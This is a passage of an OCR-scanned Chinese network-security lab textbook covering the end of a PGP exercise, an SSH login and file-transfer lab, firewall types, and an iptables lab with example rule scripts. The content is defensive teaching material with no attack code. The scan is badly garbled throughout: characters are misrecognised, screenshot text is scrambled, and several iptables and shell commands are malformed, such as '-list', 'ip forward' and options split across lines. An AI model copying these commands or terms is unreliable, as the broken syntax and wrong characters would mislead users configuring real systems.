只 要 有 用 户 A 的 公 铀 ， 都 可 以 得 到 这 样 的 数字 签名 信息 。 

(4) 加 密 和 签名 的 混合 使 用 。 

因为 过 程 与 前 面 类 似 ， 建 议 读者 自己 完成 。 

5. 使 用 PGP 加 密 邮 件 

PGP 可 以 直接 嵌入 邮件 客户 端 Outlook 中 使 用 ， 在 发 送 之 前 ， 选 中 邮件 所 有 内 容 ， 
右 击 任务 栏 中 的 PGP encryption 图 标 即 可 完成 邮件 加 密 。 收 到 邮件 双击 打开 后 ， 单 击 
Decrypt PGP Message 图 标 ， 就 可 解密 邮件 。 因 为 实验 过 程 较为 简单 ， 由 读者 自行 完成 。 

【实验 报告 】 

(1) R PGP 加 解密 文件 的 步骤 。 

(2) 简 述 PGP 的 应 用 。 

(3) 将 实验 过 程 中 重要 的 步骤 截图 并 保存 。 

【思考 题 】 

密 钥 交换 对 安全 性 有 何 影响 ? 如 何 保证 PGP 生成 的 密 钥 能 够 安全 地 发 布 与 交换 ? 
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72 SSH 

【实验 目的 】 

通过 本 实验 ， 学 习 SSH 的 基本 概念 和 认证 技术 ， 掌 握 常 用 的 SSH 软件 操作 方法 。 
【原理 简介 】 


安全 这 (Secure Shell, SSH) 是 一 种 通用 的 、 功 能 强大 的 、 基 于 软件 的 网 络 安全 性 
解决 方案 。 计 算 机 每 次 向 网 络 发 送 数 据 时 ，SSH 都 会 自动 对 其 进行 加 密 。 当 数据 到 达 目 
的 地 时 ，SSH 自动 对 数据 进行 解密 。 整 个 加 密 过 程 都 是 透明 的 ， 用 户 可 以 正常 工作 ， 根 
本 察觉 不 到 他 们 的 通信 在 网 络 上 是 经 过 加 密 的 。 另 外 , SSH 使 用 了 常用 的 安全 加 密 算法 ， 
足以 胜任 大 型 公司 繁重 任务 的 要 求 。 

SSH 具有 客户 -服务 器 结构 。SSH 客户 端 对 服务 器 发 出 请 求 ，SSH 服务 器 可 以 接受 
或 者 拒绝 客户 端的 请 求 。SSH 可 以 提供 以 下 6 种 功能 。 

e 安全 远程 登录 
。 安全 文件 传输 。 

e 安全 执行 远程 命令 。 
e 密 钥 和 代理 。 
. 
. 


访问 控制 。 
端口 转发 。 

SSH 支持 多 种 认证 方式 ， 最 常用 的 是 口令 认证 和 公 钥 认证 ， 还 支持 可 信 主 机 认证 和 
PGP 认证 等 。 

SSH 提供 的 安全 特性 ， 可 以 有 效 地 防止 一 些 攻击 ， 包 括 窃听 、 名 字 服 务 和 人 P 伪装 、 
连接 动 持 (Connection Hijacking)、 中 间 人 攻击 和 插入 攻击 。 但 是 ， 由 于 SSH 不 是 一 个 
完整 的 安全 方案 ， 不 能 预防 针对 IP 和 TCP 的 攻击 、 流 量 分 析 攻 击 和 隐蔽 通道 攻击 等 。 

SSH 协议 的 安全 特性 是 由 所 包含 密码 算法 提供 的 ，SSH 协议 因 版 本 不 同 其 所 包含 的 
算法 也 不 同 ， 如 表 7-2 所 示 。 


表 7-2 SSH 协议 中 的 算法 
SSH-1.5 协议 版 本 


算法 类 别 SSH-2.0 协议 版 本 


BA | RSA DSA, DH 
杂凑 函数 | MD5，CRC-32 SHA-1, MDS 

, , , , -128, 
对 称 密 钥 3DES, IDEA, ARCFOUR, Drs | AES: 3DES, Blowfish, Twofish, CAST-128 


IDEA, ARCFOUR 
Zlib 


压缩 Zlib 


由 于 篇 幅 原因 , 这 里 只 进行 SSH 在 口令 认证 方式 下 提供 安全 登录 和 安全 文件 传输 两 
项 功能 的 实验 ， 其 他 实验 由 读者 自行 完成 。 
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【实验 环境 】 
安装 Windows 操作 系统 的 PC 两 台 作 为 SSH 的 客户 机 和 服务 器 。 客 户 机 安装 SSH 
Secure Client 3.2.9 或 以 上 版 本 软件 ， 服 务 器 安装 WinSSHD 5.23 软件 。 


【实验 步骤 】 

1. 配置 新 的 服务 器 Windows 账户 

服务 器 配置 新 的 Windows 账户 ， 自 行 设 定 用 户 名 和 密码 ， 如 user。 同 时 ， 由 于 SSH 
用 22 号 端口 进行 通信 ， 因 此 需 开 启 服务 器 和 客户 机 防火 墙 的 22 端口 。 

2. 启动 SSH 服务 器 

在 进行 实验 之 前 ， 必 须 启动 服务 器 上 的 WinSSHD 服务 。 启 动 方法 是 : 打开 【开始 】 
I【 程 序 】|Bitvise WinSSHD|WinSSHD Control Panel, 启动 WinSSHD 控制 界面 。 单 击 Start 
WinSSHD 按钮 启动 WinSSHD 服务 ， 如 图 7-19 所 示 。 


一 — -一 一 一 
Server | Keypair | Settings | Activation | 


WinSSHD 4.23 - EVALUATION - 30 days 


Copyright (C) 2000-2007 by Bitvise Limited. 
Portions Copyright (C) 1995-2003 by Wei Dai 


Installation ID: F20646BTD90C2TTEC29B 
Copy Installation ID to Clipboard 


Please purchase within 30 days of initial installation. 
See www. Hi nSSHD. com for purchasing instructions 


The WinSSHD service is running 


Start WinSSHD fiew Windows Event Log... 


图 7-19 WinsSHD 控制 界面 


3. SSH 的 远程 登录 (口令 认证 ) 

COD 在 客户 机 ， 选 择 【 开 始 】| 【程序 】|SSH Secure ShelllSecure Shell Client， 启 动 客 
户 端 ， 如 图 7-20 所 示 。 

(2) 打开 菜单 Edit|Setting， 选 择 Profile Settings|Connection， 如 图 7-21 所 示 。 

(3) 在 图 7-21 中 Host 处 填写 服务 器 的 主机 IP， 如 192.168.0.201。User 处 填写 在 服 
务 器 端 已 经 添加 的 账户 名 ， 如 user 等 。Encryption 处 选择 界面 算法 为 AES. MAC 处 选择 
杂凑 函数 为 HMAC-SHAL. Compression 处 选择 压缩 算法 为 zlib。 其 他 的 保持 默认 状态 不 
变 。 单 击 OK 按钮 确认 配置 信息 。 

(4) 打开 菜单 FilelConnect， 弹 出 登录 对 话 框 ， 如 图 7-22 所 示 。 单 击 Connect 按钮 进 
行 连接 ， 在 弹出 的 对 话 框 中 输入 自行 设置 好 的 口令 并 单 击 OK 按钮 确认 ,如 图 7-23 所 示 。 
车 认证 失败 ， 则 如 图 7-24 所 示 。 

(5) 服务 器 端口 令 认 证 验证 通过 ， 客 户 端 显示 如 图 7-25 所 示 的 界面 。 
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- default - SSH 
|| Ble Edt View Window Heb 
|@ 62/35, BES 4 区 下 | 入 | on 


IE E) Quick Connect CJ Profiles | 


Not connected - press Enter or Space to ,| [8024 | Qi |j 


图 7-20 SSH 客户 端 


Profile Settings 
E Connection 
‘Cipher List Š E 5 
RENE Configure protocol settings for the connection. New 
piece settings will take effect upon next login. 


Specify * as the host name or the user name to be prompted 
for the information when the profile is chosen for 


EI File Transfer 
l- Remote Favorite 
-Global Settings 


Compression 


Terminal 
-Configuratio : 
E Server Authenticat [7 Connect through fire 
rth tenaaa T7 Request tunnels only (disable ter 
-LDAP Servers 
E File Transfer 

Advanced 


图 7-21 SSH 客户 端 连接 配置 界面 


Host Name: ise. 168. 0.201 Taal 
User Name: [imi Cantal | 


Port 区 
Authentication [@rofile Settings? v 


722 登录 界面 
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E 


Enter Password 5 

| OK 
Password: fener 

| Cancel | 


E723 口令 输入 界面 
Conecton rake a [x 


7 The host ’ 192. 168.0.201’ is unreachable 
The host may be down, or there may be a problem with the network connection. 


Sometimes such problems can also be caused by a misconfigured firewall. 


(6) 在 客户 端 命令 行 方式 下 ， 可 以 对 服务 器 进行 安全 操作 ， 
4. SSH 的 文件 传输 (口令 认证 ) 
CD 在 客户 机 ， 打 开 【 开 始 】| 【程序 】|SSH Secure ShelllSecure File Transfer Client, 
启动 客户 端 ， 
(2) 打开 菜单 EditlSettings， 
(3) 在 图 7-27 
务 器 端 已 经 
ei BLY HMAC-SHA1. Compression 处 选择 压缩 算法 为 zlib。 其 他 的 保持 默认 状态 
Pali OK 按钮 确认 配置 信息 。 


图 7-24 认证 失败 


Ë 192.168.0.201 - default" - SSH Secure Shell 


Ele Edit View Window Help 


TSRS 四 455 % ow 
E) Quick Connect ©) Profiles 


D: 


Connected to 192.168.0.201 SSH2 - aes128-cbc - hmac-shal | 80x24 


E 


图 7-25 ”认证 通过 后 界面 


如 图 7-26 所 示 。 


如 dir 等 DOS 命令 


选择 Profile Settings|Connection， 如 图 7-27 所 示 。 
中 Host 处 填写 服务 器 的 主机 IP， 如 192.168.0.201。User 处 填写 在 服 


加 的 账户 名 ， 如 User. Encryption 处 选择 加 密 算法 为 AES. MAC 处 选择 杂 


AS ANE 
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|| Be Edt View Operation Window Heb 

|a ssel 2S2) » [mi c Emm Mle Oo) ex 

|| E Quick Connect Ey Profiles 

||| ae 2 | ok x 可 | ada | | A aa + | ai x 本 | ad | 


Local Name / 


ISSH Secure Shell Client 


* ee | U 


Transfer| Queue) 
/ | Source Fle | Source Directory | Destination Dire... | Swe|Status | Speed| Tme| 


gm -— J+ 


Not connected - press Enter or S A A 


图 7-26 SSH 安全 文件 传输 界面 


Configure protocol settings for the connection, New 
settings will take effect upon next login. 


Specify * as the host name or the user name to be prompted 
for the information when the profile is chosen for 


Host (192. 168.0. 201 
User [sini EN 
Port 

Encryption MES =] fs - 

日 | | w RCSL z 

-SSH Accession 
PES #11 Terminal = 
Configaratio | 

Server Authenticat | [^ Connect. through fire 

| Host Keys FM Request tuancls only Gischle ter 


Certificates | Compression zlib 
fioo 


CA Certificates 
LDAP Servers 

= File Transfer 

| Advanced 


727 SSH 客户 端 连接 配置 界面 


(4) 打开 菜单 FilelConnect， 弹 出 登录 对 话 框 ， 如 图 7-28 所 示 。 单 击 Connect 按钮 进 
行 连接 ， 在 弹出 的 对 话 框 中 输入 口令 ， 单 击 OK 按钮 确认 ， 如 图 7-29 所 示 。 

(5) 服务 器 端口 令 认证 验证 通过 ， 客 户 端 显示 如 图 7-30 所 示 的 界面 。 

(6) 图 中 左 侧 为 本 地 文件 夹 列 表 ， 右 侧 为 服务 器 上 的 文件 列表 ， 可 以 通过 拖 电文 件 
夹 进行 文件 传输 操作 ， 文 件 在 传输 过 程 中 是 加 密 的 。 
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Connect to Remote Ho 


te Host None: se 168.0. 201 
User Name: 
Port 


iMi 
Authentication [erofiie Settings? v 


图 7-28 ”登录 界面 


几 Eie Edt view Operation Window Heb 

||His m me saM] tB] Pe > EE mT abs oe 
|| E) Quick Connect 回 Profiles 

alaa ela ”可 | ^e | | 2 a e | ok x | [serm -]| Add 


/ 


3 
3 


m 


2,240 
1,204 


Ein 
ESS 
ESS 
ESS 
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【实验 报告 】 
在 以 上 实验 过 程 中 , 用 Sniffer 工具 抓 取 数据 包 ， 并 与 在 Telnet 下 抓 取 的 数据 包 进行 
比较 ， 看 看 有 什么 区 别 ? 


【思考 题 】 

(1) SSH 提供 的 6 种 功能 的 实现 原理 是 什么 ? 

(2) SSH 能 够 阻止 一 些 攻击 的 原理 和 方法 是 什么 ? SSH 不 能 够 阻止 其 他 一 些 攻 击 的 
原因 是 什么 ? 是 否 能 够 改进 SSH 协议 来 阻止 这 些 攻击 ? 

OD 请 读者 自行 完成 基于 公 钥 的 认证 过 程 ， 并 演示 SSH 提供 的 6 项 功能 。 
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81 ”防火 墙 原理 简介 


防火 墙 是 由 软件 和 硬件 组 成 的 ， 它 采用 由 系统 管理 员 定 义 的 规则 ， 对 一 个 需要 安全 
保护 的 网 络 (通常 是 内 部 局 域 网 ) 和 一 个 不 安全 的 网 络 (通常 是 因特网 ， 但 不 局 限于 因 
特 网 ) 之 间 的 数据 流 施加 控制 。 

防火 墙 置 于 两 个 网 络 之 间 , 从 一 个 网 络 到 另 一 个 网 络 的 所 有 数据 流 都 要 流 经 防火 墙 。 
基于 安全 策略 ， 防 火 墙 要 么 允许 数据 流通 过 ， 要 么 拒绝 数据 流通 过 ， 或 者 将 这 些 数 据 流 
丢掉 。 当 数据 流 被 拒绝 时 ， 防 火 墙 要 向 发 送 者 发 回 一 条 消息 ， 提 示 发 送 者 该 数据 流 已 经 
被 拒绝 。 当 数据 流 被 丢掉 时 ， 防 火 墙 则 根本 不 理 皮 这 些 数 据 包 。 防 火 墙 是 因特网 安全 的 
最 基本 组 成 部 分 ， 它 应 该 具有 以 下 特性 : 

e 所 有 进出 网 络 的 数据 流 ， 都 必须 经 过 防火 墙 。 

e 只 有 授权 的 数据 流 ， 才 允许 通过 。 

e 防火 墙 自身 对 入 侵 是 免疫 的 。 

目前 ， 市 场 上 流行 的 防火 墙 主要 有 三 种 类 型 ， 即 包 过 滤 防 火 墙 、 电 路 级 网 关 和 应 用 
网 关 防火 墙 。 通 常 ， 包 过 滤 防 火 墙 的 安全 性 较 差 ， 但 性 能 最 高 ， 应 用 级 网 关 虽 然 安 全 性 
最 高 ， 但 是 它 的 性 能 较 差 ， 对 每 一 新 增 服务 都 要 编写 相应 的 代理 程序 。 究 竟 采 用 何 种 类 
型 的 防火 墙 ， 要 根据 企业 的 网 络 安全 需求 而 定 。 用 户 要 在 安全 性 和 效率 之 间 进 行 折 中 
考虑 。 

从 防火 墙 软件 和 硬件 构成 的 角度 来 看 ， 目 前 主要 有 以 下 三 种 。 

a) 第 一 类 防火 墙 即 所 谓 基于 x86 平台 的 防火 墙 。 这 类 防火 墙 是 在 工控 机 平台 上 ， 
加 装 Linux 或 FreeBSD 操作 系统 ， 编 写 相应 的 配置 管理 软件 。 它 的 优点 是 功能 扩展 性 比 
较 好 ， 缺 点 是 数据 包 的 吞吐 率 比 较 低 。 

(2) 第 二 类 防火 墙 即 所 谓 基于 NP 的 防火 墙 。 这 类 防火 墙 采用 网 络 处 理 器 (Network 
Processor) 平台 ,在 其 上 编写 相应 的 过 滤 和 配置 管理 软件 。 它 的 优点 是 功能 扩展 性 较 好 ， 
同时 数据 包 的 吞吐 率 要 高 于 基于 x86 平台 的 防火 墙 。 

(3) 第 三 类 防火 墙 即 所 谓 基于 ASIC 芯片 的 防火 墙 。 这 类 防火 墙 的 优点 是 数据 包 的 
吞吐 率 可 以 接近 或 达到 线 速 ， 缺 点 是 功能 扩展 性 很 差 。 
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82 用 iptables 构建 Linux 防火 墙 


【实验 目的 】 

A) 掌握 防火 墙 的 基本 架构 。 

(2) 掌握 利用 iptables 构建 Linux 防火 墙 的 基本 方法 。 

(3) 掌握 利用 iptables 实现 NAT 代理 、IP 伪装 等 高 级 设置 。 
(4) 掌握 简单 的 Shell 脚本 语言 编程 。 


【原理 简介 】 

静态 包 过 滤器 是 最 老 的 防火 墙 ， 静态 数据 包 过 滤 发 生 在 网 络 导 上 ， 也 就 是 OSI 模型 
的 第 三 层 上 。 对 于 静态 包 过 滤 防 火 墙 来 说 ， 决 定 接受 还 是 拒绝 一 个 数据 包 取决 于 对 数据 
tp BS IP 头 和 协议 头 的 特定 区 域 的 检查 ， 这 些 特 定 的 区 域 包括 

@ 数据 源 地 址 ; 

@ 目的 地 址 ; 

© 应 用 或 协议 ; 

QD 源 端 口号 ; 

© 目的 端口 号 。 

iptables 软件 是 netfilter 框架 下 定义 的 一 个 包 过 滤 子 系统 。netfilter 作为 中 间 件 在 协议 
栈 中 提供 了 一 些 钧 子 函数 (Hooks)， 用 户 可 以 利用 钧 子 函数 择 入 自己 的 程序 ， 扩 展 所 需 
的 功能 。 图 8-1 说 明了 IPv4 中 数据 包 经 过 netfilter 的 过 程 。 从 图 中 可 以 看 到 IPv4 中 5 
个 钧 子 函 数 的 放置 位 置 ， 函 数 定义 在 内 核 头 文件 linux/netfilter-ipv4.h 中 。 


- Hook 4. | ——*— 
Packet in Packet out 
数据 包 经 路 由 Rangan 
至 本 地 进程 处 理 


本 地 产生 
的 数据 包 


图 8-1 数据 包 经 过 netfilter 的 过 程 


下 面 以 iptables-filter 模块 的 工作 流程 为 例 简 单 介绍 一 下 netfilter/iptables 是 如 何 工 作 
的 。 首 先 ， 当 一 个 包 进来 的 时 候 ， 也 就 是 从 以 太 网 卡 进 入 防火 墙 ， 内 核 首先 根据 路 由 表 
决定 包 的 目标 。 如 果 目 标 主机 就 是 本 机 ， 则 直接 进入 INPUT 链 ， 再 由 本 地 正在 等 待 该 
包 的 进程 接收 ， 结 束 。 和 否则 ， 如 果 从 以 太 网 卡 进来 的 包 目 标 不 是 本 机 ， 再 看 是 否 内 核 允 
许 转发 包 ， 如 果 不 允 许 转发 ， 则 包 被 DROP 掉 ， 如 果 人 允许 转发 ， 则 送出 本 机 ， 结 束 。 这 
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当中 决 不 经 过 INPUT 或 者 OUTPUT 链 ， 因 为 路 由 后 的 目标 不 是 本 机 ， 只 被 转发 规则 应 
用 。 最 后 ， 该 Linux 防火 墙 主机 本 身 能 够 产生 包 ， 这 种 包 只 经 过 OUTPUT 链 出 去 。 


【实验 环境 】 

1. 环境 搭建 

(1) 准备 普通 PC 一 台 。 

(2) 在 该 PC 的 PCI 插 槽 上 安装 两 个 以 太 网 卡 。 

(3) 在 该 PC 上 安装 Red Hat Linux 操作 系统 。 

ERA Linux 2.4 的 PC 上, 可 以 直接 利用 iptables 实现 防火 墙 功能 。 利 用 命令 service 
iptables start 或 者 在 启动 菜单 中 启动 该 服务 ， 并 根据 下 面 的 参数 说 明 ， 设 置 规则 ， 然 后 
利用 本 机 的 网 络 访问 进行 测试 。 

2. iptables 参数 说 明 

iptables 参数 格式 : iptables [-ttable] command [match] [target] 

1) 表 (table) 

“ 表 ” 是 包含 仅 处 理 特定 类 型 信息 包 的 规则 和 链 的 信息 包 过 滤 表 。[-t table] 选 项 允许 
使 用 标准 表 之 外 的 任何 表 。 有 三 个 可 用 的 表 选 项 : filter, nat 和 mangle。 该 选项 不 是 必 
需 的 ， 如 果 未 指定 ， 则 filter 作为 默认 表 。 各 表 实 现 的 功能 如 表 8-1 所 示 。 

表 8-1 RSW 

K 名 实现 功能 
默认 的 表 , 包含 内 建 的 链 INPUT (处 理 进入 的 包 ) 、FORWORD (处 理 通 过 的 包 ) 
All OUTPUT (处 理 本 地 生成 的 包 ) 

这 个 表 被 查询 时 表示 遇 到 了 产生 新 的 连接 的 包 ,由 三 个 内 建 的 链 构 成 : 
nat PREROUTING (修改 到 来 的 包 ) ~ OUTPUT (修改 路 由 之 前 本 地 的 包 ) 、 
POSTROUTING 修改 准备 出 去 的 包 ) 


j 用 来 对 指定 的 包 进 行 修改 。 它 有 两 个 内 建 规则 : PREROUTING (修改 路 由 之 前 进 
ea 入 的 包 ) 和 OUTPUT (修改 路 由 之 前 本 地 的 包 ) 


2) 命令 (command) 
command 部 分 是 iptables 最 重要 的 部 分 。 它 告诉 iptables 命令 要 做 什么 , 例如 插入 规 
则 、 将 规则 添加 到 链 的 末尾 或 删除 规则 。 表 8-2 是 最 常用 的 一 些 命令 。 


表 8-2 命令 参数 

2 X fie FE 
-A 或 -append 在 所 选择 的 链 末 添 加 一 条 或 更 多 规则 
-D 或 -delete 从 所 选 链 中 删除 一 条 或 更 多 规则 
-R 或 -replace 从 选中 的 链 中 取代 一 条 规则 
-I 或 -insert 根据 给 出 的 规则 序号 向 所 选 链 中 插入 一 条 或 更 多 规则 
-L 或 -list 显示 所 选 链 的 所 有 规则 
下 或 -flush 清空 所 选 链 
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续 表 
参数 fie FE 
-Z 或 -zero 把 所 有 链 的 包 及 字 节 的 计数 器 清空 
-N 或 -new-chain 根据 给 出 的 名 称 建立 一 个 新 的 用 户 定义 链 
-X 或 -delete-chain 删除 指定 的 用 户 自 定义 链 
-P 或 -policy 设置 链 的 目标 规则 
-E 或 -rename-chain 根据 用 户 给 出 的 名 字 对 指定 链 进行 重 命名 


3) 匹配 Cmatch) 


iptables 命令 的 可 选 match 部 分 指定 信息 包 与 规则 匹配 所 应 具有 的 特征 (如 源 地 址 、 


目的 地 址 、 协 议 等 )。 匹 配 分 为 通用 匹配 和 特定 于 协议 的 
于 采用 任何 协议 的 信息 包 的 通用 匹配 。 表 8-3 


说 明 。 


Ww 


数 
-p 或 -protocal 


-S 或 -Source 


-d 或 -destination 


-j 或 -jump 
-i 或 -in-interface 


-0 或 -out-interface 


4) 目标 (target) 


匹配 两 大 类 。 这 里 将 介绍 可 用 
匹配 及 示例 


EL. 
A 


- 些 重要 且 常 用 的 通用 


表 8-3 常用 匹配 参数 表 


解 释 
规则 或 者 包 检 查 〈 待 检查 包 ) 的 协议 。 指 定 协议 可 以 是 TCP、UDP、ICMP 


中 的 一 个 或 者 全 部 

指定 源 地 址 ， 可 以 是 主机 名 、 网 络 名 和 清楚 的 TP 地 址 
指定 目标 地 址 

目标 跳 转 

进入 的 (网 络 ) 接口 

输出 接口 [名 称 ] 


添加 规则 


目标 是 由 规则 指定 的 操作 ， 对 与 那些 规则 匹配 的 信息 包 执行 这 些 操作 。 表 8-4 是 常 
用 的 一 些 目 标 及 示例 说 明 。 除 了 人 允许 用 户 定义 的 目标 之 外 ， 还 有 许多 可 用 的 目标 选项 。 


表 8-4 目标 参数 
ir S fie R 
ACCEPT 让 这 个 包 通 过 
DROP 将 这 个 包 丢弃 
QUEUE 把 这 个 包 传递 到 用 户 空间 
RETURN 停止 这 条 链 的 匹配 ， 到 前 一 个 链 的 规则 重新 开始 


iptables 的 更 多 参数 信息 可 以 用 命令 man iptables 获取 。 
3. iptables 的 简单 配置 


查看 规则 集 : 


[root@localhost ~]# iptables -list 
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清除 预 设 表 filter 中 的 所 有 规则 链 的 规则 : 


[root@localhost ~]# iptables -F 


创建 一 个 具有 很 好 灵活 性 、 可 以 抵御 各 种 意外 事件 的 规则 需要 大 量 的 时 间 。 简 单 可 
行 的 方法 是 先 拒绝 所 有 的 数据 包 ， 然 后 再 根据 需要 设 定 允 许 规则 。 下 面 为 每 一 个 链 设 置 


默认 的 规则 : 


[root@localhost ~]# iptables -P INPUT DROP 
[root@localhost ~]# iptables -P OUTPUT ACCEPT 
[root@localhost ~]# iptables -P FORWARD DROP 


这 里 选项 -P 用 于 设置 链 的 策略 ， 只 有 三 个 内 建 的 链 才 有 策略 。 上 述 策略 可 以 让 信息 
毫 无 限制 地 流出 ， 但 不 允许 信息 流入 。 
之 后 添加 INPUT 链 , INPUT 链 的 默认 规则 是 DROP, 所 以 必须 写 需 要 ACCEPT OÑ 
过 ) 的 链 。 为 了 能 采用 远程 SSH 登录 ， 需 要 开启 22 端口 : 
[root@localhost ~]# iptables -A INPUT -p tcp --dport 22 -j ACCEPT 
如 果 需 要 Web 服务 器 ， 需 开启 80 端口 : 
[root@localhost ~]# iptables -A INPUT -p tcp --dport 80 -j ACCEPT 


允许 IP 地 址 为 192.168.0.100 的 机 器 进行 SSH 连接 : 


[root@localhost ~]# iptables -A INPUT -s 192.168.0.100 -p tcp -- 
dport 22 -j ACCEPT 


如 果 要 允许 或 限制 一 段 IP 地 址 可 用 192.168.0.0/24 表示 192.168.0.1—255 端的 所 
有 IP: 


[root@localhost ~]# iptables -A INPUT -s 192.168.0.0/24 -p tcp -- 


dport 22 -j ACCEPT 
[rootGlocalhost ~]# iptables -A INPUT -s 192.168.0.0/24 -p tcp -- 


dport 22 -j DROP 


4. 实际 应 用 
以 下 命令 为 Linux 下 的 Shell 脚本 命令 ， 可 以 直接 执行 ,或 者 编写 到 脚本 文件 中 , 增 
加 其 可 执行 属性 ， 直 接 执行 即 可 。 其 中 以 # 为 首 的 语句 为 脚本 命令 解释 行 。 


Fa 
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# 打 开 IP 伪装 功能 (路 由 ) 
modprobe ipt_MASQUERADE 
iptables -t nat -A POSTROUTING -s 172.16.0.0/24 -j ACCEPT 


# 打 开 forward 功能 
echo "1" > /proc/sys/net/ipv4/ip forward 


# 清 除 预 设 表 filter 中 ,所 有 规则 链 中 的 规则 
iptables -F 


# 设 定 filter table 的 预 设 政策 
iptables -P INPUT DROP 
iptables -P OUTPUT DROP 
iptables -P FORWARD DROP 


# 对 INPUT 链 进行 限制 ,来 自 内 部 网 络 的 封包 无 条 件 放行 
iptables -A INPUT -s 172.16.0.0/24 -j ACCEPT 
iptables -A INPUT -s 192.168.0.254 -j ACCEPT 


# 从 WAN 进入 防火 墙 主机 的 所 有 封包 , 检查 是 否 为 响应 封包 , 若是 则 予以 放行 
iptables -A INPUT -d 172.16.0.0/24 -m state --state ESTABLISHED, 
RELATED -j ACCEPT 


# 对 OUTPUT 链 进行 限制 , 所 有 输出 全 部 放行 
iptables -A OUTPUT -j ACCEPT 


#ping 命令 的 限制 ,本 机 可 以 ping 别 的 机 器 ,而 阻止 别 的 计算 机 ping 本 机 
iptables -A FORWARD -p icmp -s 172.16.0.0/24 --icmp-type 8 -j ACCEPT 
iptables -A FORWARD -p icmp --icmp-type 0 -d 172.16.0.0/24 -j ACCEPT 


# 以 下 命令 用 于 设置 观看 外 部 网 站 

# 开 放 内 部 网 络 可 以 观看 外 部 网 络 的 网 站 。open 对 外 部 主机 的 HTTP port 80-83 
iptables -A FORWARD -o eth0 -p tcp -s 172.16.0.0/24 --sport 1024: 
65535 --dport 80:83 -j ACCEPT 

iptables -A FORWARD -i eth0 -p tcp ! --syn --sport 80:83 -d 172.16.0.0/ 
24 --dport 1024:65535 -j ACCEPT 


# 以 下 命令 用 于 设置 远程 控制 

# 开 放 内 部 主机 可 以 telnet 至 外 部 的 主机 , 开放 内 部 网 络 ,可 以 telnet 至 外 部 主机 
iptables -A FORWARD -o eth0 -p tcp -s 172.16.0.0/24 --sport 1024: 
65535 --dport 23 -j ACCEPT 

iptables -A FORWARD -i eth0 -p tcp ! --syn -s 192.168.1.110/32 -- 
sport 23 -d 172.16.0.0/24 --dport 1024:65535 -j ACCEPT 
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# 以 下 命令 用 于 设置 E-mail 服务 ,别人 可 以 送信 给 你 , BE SMTP 的 25 端口 

iptables -A FORWARD -i eth0 -p tcp --sport 1024:65535 -d 172.16.0.0/ 
24 --dport 25 -j ACCEPT 

iptables -A FORWARD -o eth0 -p tcp ! --syn -s 172.16.0.0/24 --sport 
25 --dport 1024:65535 -j ACCEPT 


# 开 放 内 部 网 络 可 以 对 外 部 网 络 的 PoP3 Server 取信 件 

iptables -A FORWARD -o eth0 -p tcp -s 172.16.0.0/24 --sport 1024: 
65535 --dport 110 -j ACCEPT 

iptables -A FORWARD -i eth0 -p tcp ! --syn --sport 110 -d 172.16.0.0/ 
24 --dport 1024:65535 -j ACCEPT 


# 设 置 FTP 服务 。 打 开 控制 连接 端口 21 和 数据 传输 端口 20 

iptables -A FORWARD -o eth0 -p tcp -s 172.16.0.0/24 --sport 1024: 
65535 --dport 20:21 -j ACCEPT 

iptables -A FORWARD -i eth0 -p tcp ! --syn --sport 20:21 -d 172.16.0.0/ 
24 --dport 1024:65535 -j ACCEPT 


【实验 步骤 】 

CD 在 Linux 环境 下 进行 系统 初始 化 操作 。 

CD 清除 预 设 表 filter 中 所 有 规则 链 中 的 规则 

@ 添加 规则 

@ 删除 规则 

© 查看 规则 

(2) 设 定 filter table 的 预 设 政策 ， 将 所 有 政策 预 设 为 拒绝 ， 并 进行 网 络 检验 。 
(3) 进行 ping 命令 限制 ， 分 别 完成 以 下 操作 。 

®© 本 机 可 以 ping 他 机 ， 而 阻止 他 机 ping 本 机 

Q) 他 机 可 以 ping 本 机 ， 而 阻止 本 机 ping 他 机 

@ 本 机 可 以 ping 他 机 ， 同 时 允许 他 机 ping 本 机 

掌握 其 检验 方法 。 

(4) 进行 端口 命令 的 设置 ， 并 分 别 完 成 以 下 操作 。 

© 开放 或 者 禁止 局 域 网 访问 外 部 网 站 

Q) 利用 vsftpd 为 远 端 提供 FTP 服务 ， 通 过 防火 墙 进行 读 取 限 制 

@ 提供 Telnet 服务 ， 但 禁止 某 些 外 部 IP 访问 

(à) 禁止 Telnet 服务 的 端口 

并 掌握 其 检验 方法 。 

(5) 进行 地 址 伪装 命令 的 设置 。 将 本 地 地 址 伪装 为 163.26.197.8， 并 进行 检验 。 
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【实验 报告 】 
利用 iptables 实现 Linux 防火 墙 功 能 如 表 8-5 所 示 。 请 在 此 表 的 空白 处 填 入 适当 内 容 。 
表 8-5 利用 iptables 实现 Linux 防火 墙 功能 


规则 操作 规则 脚本 规则 参数 说 明 
查看 所 有 规则 
删除 所 有 规则 
预 设 In 链 的 策略 为 拒绝 


本 机 可 以 ping 他 机 ， 而 阻止 他 机 ping 本 机 
他 机 可 以 ping 本 机 ， 阻 止 本 机 ping 他 机 
开放 局 域 网 访问 外 部 网 站 

禁止 局 域 网 访问 外 部 网 站 

利用 vsftpd 为 远 端 提供 FTP 服务 ， 开 放 服 务 
利用 vsftpd 为 远 端 提供 FTP 服务 ， 禁 止 服务 
提供 Telnet 服务 ， 但 禁止 某 些 外 部 IP 访问 
提供 Telnet 服务 ， 关 闭 服务 端口 

将 本 地 地 址 伪装 为 163.26.197.8 


【思考 题 】 

CD 为 什么 通常 要 把 所 有 链 的 预 设 策略 都 设置 成 DROP? 

(2) 如 果 规 则 链 中 有 两 条 规则 是 互相 矛盾 的 ， 比 如 前 一 条 是 禁止 某 个 端口 ， 后 一 条 
是 打开 这 个 端口 ， 请 问 这 会 出 现 什 么 情况 ? 

(D 考虑 限制 其 他 常见 的 网 络 功能 ， 例 如 对 FTP、 远 程控 制 、QQ 服务 等 网 络 功能 
施加 限制 。 


83 _ 硬件 防火 墙 的 配置 及 使 用 


在 本 实验 中 , 选择 了 由 北京 航空 航天 大 学 电子 信息 工程 学 院 自主 开发 的 防火 墙 产 品 。 
该 产品 是 基于 NP 网 络 处 理 器 开发 的 新 一 代 芯片 级 防火 墙 。 目 前 ， 该 产品 已 授权 北京 西 
普 阳光 教育 科技 有 限 公 司 独家 代理 销售 。 


【实验 目的 】 

(1) 理解 防火 墙 的 路 由 功能 和 IP 伪装 功能 的 原理 及 实现 技术 。 
(2) 熟悉 网 络 数 据 包 的 数据 格式 和 状态 位 。 

(3) 理解 防火 墙 的 网 桥 功 能 。 

(4) 深入 理解 TCP/IP 协议 和 网 络 数据 包 的 数据 格式 。 

(5) 了 解 网 络 处 理 器 CNP) 的 架构 。 

(6) 了 解 B-S 控制 模式 和 CGI 远程 控制 。 
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【原理 简介 】 

1. 路 由 模式 防火 墙 

